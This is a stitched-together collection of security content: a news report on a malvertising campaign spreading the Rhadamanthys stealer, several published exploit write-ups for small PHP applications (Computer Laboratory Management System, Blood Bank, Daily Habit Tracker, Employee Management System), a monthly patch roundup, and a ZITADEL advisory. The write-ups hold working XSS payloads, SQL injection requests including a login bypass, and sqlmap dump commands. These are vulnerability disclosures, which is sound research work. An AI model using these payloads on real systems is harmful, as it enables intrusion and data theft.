Campaign distributes malware disguised as legitimate installers for popular workplace collaboration apps by abusing a traffic-tracking feature.

Source: Bits and Splits via Shutterstock

Attackers are once again abusing Google Ads to target people with info-stealing malware, this time using an ad-tracking feature to lure corporate users with fake ads for popular collaborative groupware such as Slack and Notion.

Researchers from AhnLab Security Intelligence Center (ASEC) discovered a malicious campaign that uses a statistical feature to embed URLs that distribute malware, including the Rhadamanthys stealer, they revealed in a blog post published this week. The feature lets advertisers insert external analytic website addresses into ads to collect and use their visitors' access-related data to calculate ad traffic.

However, instead of inserting a URL for an external statistics site, attackers are abusing the feature to enter sites for distributing malicious code, the researchers found.

Ads related to the campaign have already been deleted. But when they were still active, "clicking on the banner would take unsuspecting users to the address that would trick them into downloading a malicious file," according to ASEC.

In the campaign, Rhadamanthys is disguised as an installer for popular groupware often used by corporate teams for workplace collaboration. Once the malware is installed and executed, it downloads malicious files and payloads from the attacker's server.

**Redirects to Stealer Downloads**

The ASEC post breaks down how attackers crafted the campaign to show banner ads that contain tracking URLs invisible to the end user that redirect users to an attacker-created and -controlled URL. This ultimate landing page is similar to the actual website of a groupware tool such as Slack or Notion, and it prompts visitors to download and execute the malware, which is distributed in an installer form.

Typical installers used by the campaign are the Inno Setup installer or Nullsoft Scriptable Install System (NSIS) installer; specifically, attackers used the following executable files: Notion\_software\_x64\_.exe Slack\_software\_x64\_.exe; Trello\_software\_x64\_.exe; and GoodNotes\_software\_x64\_32.exe.

"Once it is executed, the malware uses websites that can save texts such as textbin or tinyurl to access the malicious payload addresses," ASEC said in its blog post, which lists the URLs attackers used to fetch these addresses, which are subsequently delivered to users.

The ultimate payload of the campaign is the Rhadamanthys stealer, which gets injected into legitimate Windows files via the "%system32%" path, according to ASEC. This allows the stealer to exfiltrate users' private data without their knowledge, the researchers noted.

Rhadamanthys is popular with attackers and is available for purchase on the Dark Web under a malware-as-a-service model. It acts as a typical stealer to collect system information, such as computer name, username, OS version, and other machine details. It also queries the directories of installed browsers — including Brave, Edge, Chrome, Firefox, Opera Software — to search for and steal browser history, bookmarks, cookies, auto-fills, login credentials, and other data.

**Pay Attention to Ad-Delivered URLs**

The campaign is certainly not the first time that attackers have abused Google Ads and its associated features to deliver Rhadamanthys and other malware, and it likely won't be the last. In fact, a campaign identified in January 2023 also used website redirects from Google Ads and fake-download lures for popular remote-workforce software, such as Zoom and AnyDesk to deliver Rhadamanthys.

Attackers have even abused the "dynamic search ads" feature of the service to amplify the effect of malicious campaigns by creating targeted ads to deliver a flood of malware.

Indeed, as "all search engines that provide tracking to calculate ad traffic can be used to distribute malware," users must stay vigilante when accessing links from ads delivered by Google, ASEC warned. Specifically, they should "pay attention to the URL that is seen upon accessing the website, not the URL that is shown on the ad's banner" to avoid falling for a malicious campaign, according to the post.

ASEC also posted a comprehensive list of URLs associated with various stages of the campaign to help administrators identify if any corporate users have been affected by it.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Attackers Abuse Google Ad Feature to Target Slack, Notion Users

Computer Laboratory Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

#Vulnerability Details:  
#Application Name: Computer Laboratory Management System  
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
#Vendor Homepage: https://www.sourcecodester.com/users/tips23  
#BuG: Insecure Direct Object References (IDOR) and Account Takeover  
#BuG_Author: SoSPiro  
#CVE: CVE-2024-3140

# Vulnerable code section:

foreach($_POST as $k => $v){  
    $v = $this->conn->real_escape_string($v);  
    if(in_array($k, $main_field)){  
        if(!empty($data)) $data .= ", ";  
        $data .= " `{$k}` = '{$v}' ";  
    }  
}

- The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.

# Vulnerability Description:

- The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack.

# Proof of Concept (PoC):

- Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing

- Request:

POST /php-lms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571  
Content-Length: 946  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-lms/admin/?page=user  
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
X-PwnFox-Color: green

-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="id"

8  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="firstname"

staff2  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="middlename"

<script>alert(1)</script>  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="lastname"

asd  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="username"

staff  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="password"

-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

-----------------------------381104392340117332004262429571--

- In this POST request, an attacker has included a script tag in the "middlename" field:

<script>alert(1)</script>

- When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application.

# Impact:

- The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users.

# Reproduce:

https://github.com/Sospiro014/zday1/blob/main/xss_1.md  
https://vuldb.com/?id.258915  
https://www.cve.org/CVERecord?id=CVE-2024-3140

Computer Laboratory Management System 1.0 Cross Site Scripting

Computer Laboratory Management System version 1.0 suffers from an insecure direct object reference vulnerability.

#Vulnerability Details:  
#Application Name: Computer Laboratory Management System  
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
#Vendor Homepage: https://www.sourcecodester.com/users/tips23  
#BuG: Insecure Direct Object References (IDOR) and Account Takeover  
#BuG_Author: SoSPiro  
#CVE: CVE-2024-3139

# Vulnerable code section:

if(!empty($_FILES['img']['tmp_name'])){  
    if(!is_dir(base_app."uploads/avatars"))  
        mkdir(base_app."uploads/avatars");  
    $ext = pathinfo($_FILES['img']['name'], PATHINFO_EXTENSION);  
    $fname = "uploads/avatars/$id.png"; // The $id value is directly used in the file path  
    // Rest of the code  
}

# Vulnerability Description:

This vulnerability exists in the section of code responsible for handling file uploads. The $id variable, obtained from user input ($_POST), is utilized directly in constructing the file path without appropriate validation or authorization checks, leading to both IDOR and account takeover vulnerabilities. This allows an attacker to manipulate the $id parameter to access and modify files of other users, including administrators.

# Proof of Concept (PoC):

- Poc Video : https://drive.google.com/file/d/1P0Vg_sYM9S43_rJTe1l5E2Vt9gzvb0YX/view?usp=sharing

- Request:

POST /php-lms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------38244968796537297751592545024  
Content-Length: 8393  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-lms/admin/?page=user  
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
X-PwnFox-Color: green

-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="id"

7  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="firstname"

testtt  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="middlename"

testMiddle   
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="lastname"

te Last Name   
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="username"

admin2  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="password"

qwe123  
-----------------------------38244968796537297751592545024  
Content-Disposition: form-data; name="img"; filename="hack.png"  
Content-Type: image/png

PNG  
...

- Response:

HTTP/1.1 200 OK  
Date: Mon, 01 Apr 2024 10:19:19 GMT  
Server: Apache/2.4.54 (Win64) PHP/8.2.0 mod_fcgid/2.3.10-dev  
X-Powered-By: PHP/8.2.0  
X-Xdebug-Profile-Filename: c:/wamp64/tmp\trace.localhost.1711966759.10780.cgrind  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 1  
Connection: close  
Content-Type: text/html; charset=UTF-8

1

# Impact:

This vulnerability allows attackers to access and modify user data and profile pictures, leading to potential phishing, distribution of malicious content, and reputational damage. Additionally, unauthorized access to administrator accounts can occur, resulting in the compromise of sensitive information. This poses a significant risk to the security and usability of the application.

# Reproduce:

https://github.com/Sospiro014/zday1/blob/main/idor%2Baccaunt_takeover.md  
https://vuldb.com/?id.258914  
https://www.cve.org/CVERecord?id=CVE-2024-3139

Computer Laboratory Management System 1.0 Insecure Direct Object Reference

Blood Bank version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)# Date: 2023-11-14# Exploit Author: Ersin Erenler# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip# Version: 1.0# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0# CVE : CVE-2023-46020-------------------------------------------------------------------------------# Description:The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.Vulnerable File: updateprofile.phpParameters: rename, remail, rphone, rcity# Proof of Concept:----------------------1. Intercept the POST request to updateprofile.php via Burp Suite2. Inject the payload to the vulnerable parameters3. Payload: "><svg/onload=alert(document.domain)>4. Example request for rname parameter:---POST /bloodbank/file/updateprofile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 103Origin: http://localhostConnection: closeReferer: http://localhost/bloodbank/rprofile.php?id=1Cookie: PHPSESSID=<some-cookie-value>Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update----5. Go to the profile page and trigger the XSSXSS Payload:"><svg/onload=alert(document.domain)>

Blood Bank 1.0 Cross Site Scripting

Daily Habit Tracker version 1.0 suffers from an access control vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24496### Broken Access Control:> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.### Affected Components:> home.php, add-tracker.php, delete-tracker.php, update-tracker.php### Description:> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.## Proof of Concept:### Unauthenticated Access to Home page> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.### Create Tracker as Unauthenticated UserTo create a tracker, use the following request:```POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 108Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes```### Update Tracker as Unauthenticated UserTo update a tracker, use the following request:```POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 121Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes```### Delete Tracker as Unauthenticated User:To delete a tracker, use the following request:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.

Daily Habit Tracker 1.0 Broken Access Control

Daily Habit Tracker version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - SQL Injection# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24495### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> delete-tracker.php### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### Manual ExploitationThe payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1```![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true)### SQLMapSave the following request to `delete_tracker.txt`:```GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump```## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Daily Habit Tracker 1.0 SQL Injection

Daily Habit Tracker version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24494### Stored Cross-Site Scripting (XSS):> Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security.### Affected Components:> add-tracker.php, update-tracker.phpVulnerable parameters: - day - exercise - pray - read_book - vitamins - laundry - alcohol - meat### Description:> Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page.## Proof of Concept:The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability.Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value:```POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 175Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/habit-tracker/home.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes```![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true)## RecommendationsWhen using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Daily Habit Tracker 1.0 Cross Site Scripting

Employee Management System version 1.0 suffers from additional remote SQL injection vulnerabilities. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

    # Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24499### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> /employee_akpoly/Admin/edit_profile.php> Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.![txtfullname](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtfullname_sqli.png?raw=true)![txtphone](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtphone_sqli.png?raw=true)### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### SQLMapSave the following request to `edit_profile.txt`:```POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 88Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/edit_profile.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate=```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump```## RecommendationsWhen using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.------------------------# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)# Date: 2 Feb 2024# Exploit Author: Yevhenii Butenko# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html# Version: 1.0# Tested on: Debian# CVE : CVE-2024-24497### SQL Injection:> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.### Affected Components:> /employee_akpoly/Admin/login.php> Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection.![txtusername](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtusername_sqli.png?raw=true)![txtpassword](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtpassword_sqli.png?raw=true)### Description:> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.## Proof of Concept:### Manual ExploitationThe payload `' and 1=1-- -` can be used to bypass authentication within admin login page.```POST /employee_akpoly/Admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 61Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/login.phpCookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin=```### SQLMapSave the following request to `admin_login.txt`:```POST /employee_akpoly/Admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 62Origin: http://localhostConnection: closeReferer: http://localhost/employee_akpoly/Admin/login.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txtusername=admin&txtpassword=password&btnlogin=```Use `sqlmap` with `-r` option to exploit the vulnerability:```sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump```## RecommendationsWhen using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.

Employee Management System 1.0 SQL Injection

Plus: Microsoft patches over 60 vulnerabilities, Mozilla fixes two Firefox zero-day bugs, Google patches 40 issues in Android, and more.

It’s time to check your software updates. March has seen the release of important patches for Apple’s iOS, Google’s Chrome, and its privacy-conscious competitor Firefox. Bugs have also been squashed by enterprise software giants including Cisco, VMware, and SAP.

Here’s what you need to know about the security updates issued in March.

**Apple iOS**

Apple made up for a quiet February by issuing two separate patches in March. At the start of the month, the iPhone maker released iOS 17.4, fixing over 40 flaws including two issues already being used in real-life attacks.

Tracked as CVE-2024-23225, the first bug in the iPhone Kernel could allow an attacker to bypass memory protections. “Apple is aware of a report that this issue may have been exploited,” the iPhone maker said on its support page.

Tracked as CVE-2024-23296, the second flaw, in RTKit, the real-time operating system used in devices including AirPods, could also allow an adversary to bypass Kernel memory protections.

Later in March, Apple released a second software update, iOS 17.4.1, this time fixing two flaws in its iPhone software, both tracked as CVE-2024-1580. Using the issues patched in iOS 17.4.1, an attacker could execute code if they convinced someone to interact with an image.

Soon after issuing iOS 17.4.1, Apple released patches for its other devices to fix the same bugs: Safari 17.4.1, macOS Sonoma 14.4.1 and macOS Ventura 13.6.6.

**Google Chrome**

March was another hectic month for Google, which patched multiple flaws in its Chrome browser. Mid-way through the month, Google released 12 patches, including a fix for CVE-2024-2625, an object-lifecycle issue in V8 with a high severity rating.

Medium-severity issues include CVE-2024-2626, an out-of-bounds read bug in Swiftshader; CVE-2024-2627, a use-after-free flaw in Canvas; and CVE-2024-2628, an inappropriate implementation issue in Downloads.

At the end of the month, Google issued seven security fixes, including a patch for a critical use-after-free flaw in ANGLE tracked as CVE-2024-2883. Two further use-after-free bugs, tracked as CVE-2024-2885 and CVE-2024-2886, were given a high-severity rating. Meanwhile, CVE-2024-2887 is a type-confusion flaw in WebAssembly.

The last two issues were exploited at the Pwn2Own 2024 hacking contest, so you should update your Chrome browser ASAP.

**Mozilla Firefox**

Mozilla’s Firefox had a busy March, after patching two zero-day vulnerabilities exploited at Pwn2Own. CVE-2024-29943 is an out-of-bounds access bypass issue, while CVE-2024-29944 is a privileged JavaScript Execution flaw in Event Handlers that could lead to sandbox escape. Both issues are rated as having a critical impact.

Earlier in the month, Mozilla released Firefox 124 to address 12 security issues, including CVE-2024-2605, a sandbox-escape flaw affecting Windows operating systems. An attacker could have leveraged the Windows Error Reporter to run arbitrary code on the system, escaping the sandbox, Mozilla said.

CVE-2024-2615 sees critical-rated memory safety bugs fixed in Firefox 124. “Some of these bugs showed evidence of memory corruption, and we presume that with enough effort \[they\] could have been exploited to run arbitrary code,” Mozilla said.

**Google Android**

Google has released its March Android Security Bulletin, fixing nearly 40 issues in its mobile operating system, including two critical bugs in its system component. CVE-2024-0039 is a remote code-execution flaw, while CVE-2024-23717 is an elevation-of-privilege vulnerability.

“The most severe of these issues is a critical security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed,” Google said in its advisory.

You Should Update Apple iOS and Google Chrome ASAP

### Impact

ZITADEL users can upload their own avatar image and various image types are allowed.

Due to a missing check, an attacker could upload HTML and pretend it is an image to gain access to the victim's account in certain scenarios.
A possible victim would need to directly open the supposed image in the browser, where a session in ZITADEL needs to be active for this exploit to work.

The exploit could only be reproduced if the victim was using Firefox. Chrome, Safari as well as Edge did not execute the code.

### Patches

2.x versions are fixed on >= [2.48.3](https://github.com/zitadel/zitadel/releases/tag/v2.48.3)
2.47.x versions are fixed on >= [2.47.8](https://github.com/zitadel/zitadel/releases/tag/v2.47.8)
2.46.x versions are fixed on >= [2.46.5](https://github.com/zitadel/zitadel/releases/tag/v2.46.5)
2.45.x versions are fixed on >= [2.45.5](https://github.com/zitadel/zitadel/releases/tag/v2.45.5)
2.44.x versions are fixed on >= [2.44.7](https://github.com/zitadel/zitadel/releases/tag/v2.44.7)
2.43.x versions are fixed on >= [2.43.11](https://github.com/zitadel/zitadel/releases/tag/v2.43.11)
2.42.x versions are fixed on >= [2.42.17](https://github.com/zitadel/zitadel/releases/tag/v2.42.17)

ZITADEL recommends upgrading to the latest versions available in due course.

### Workarounds

There is no workaround since a patch is already available.

### References

None

### Questions

If you have any questions or comments about this advisory, please email us at [security@zitadel.com](mailto:security@zitadel.com)

### Credits

Thanks to Amit Laish – GE Vernova for finding and reporting the vulnerability.


Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
